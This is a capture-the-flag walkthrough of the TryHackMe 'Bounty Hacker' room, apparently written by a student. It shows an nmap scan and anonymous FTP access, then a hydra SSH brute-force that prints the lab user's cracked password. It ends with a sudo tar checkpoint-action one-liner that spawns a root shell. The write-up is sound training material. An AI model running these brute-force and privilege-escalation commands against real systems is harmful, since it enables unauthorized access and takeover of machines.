[THM] Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Link to the room

Overview

Inside an ftp server there is a user and a list of words with which to cracker the ssh service.

To escalate privileges it is found that the user can execute taras root

[Task 1] Living up to the title.

$ nmap -sC -sV -T4 10.10.89.249
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 21:41 CEST
Nmap scan report for 10.10.89.249
Host is up (0.092s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Cant get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.17.97
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.41 seconds

First of all I make an enumeration of the machine and I see that I can make anonymous login in ftp so I go in and download both files that I find

#3 Who wrote the task list?

one file is a list of words and the other a note signed by a certain lin

lin

#4 What service can you bruteforce with the text file found?

ssh

#5 What is the users pasword?

having the list of words you only need to crack the password

$ hydra -l lin -P fuzzy-octo-guacamole/pentest/tryhackme/bounty_hacker/locks.txt 10.10.89.249 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-20 21:44:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.89.249:22/
[22][ssh] host: 10.10.89.249 login: lin password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-20 21:44:41
in:RedDr4gonSynd1cat3

#6 user.txt

THM{***************}

#7 root.txt

The next step I take before doing a complete enumeration of the machine is to try with sudo -l and I see that I can use the tar command

this command allows us to perform privilege escalation in a very simple way

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

and that’s it, we are root

THM{***********}

Computer Science student. Capture the flag player.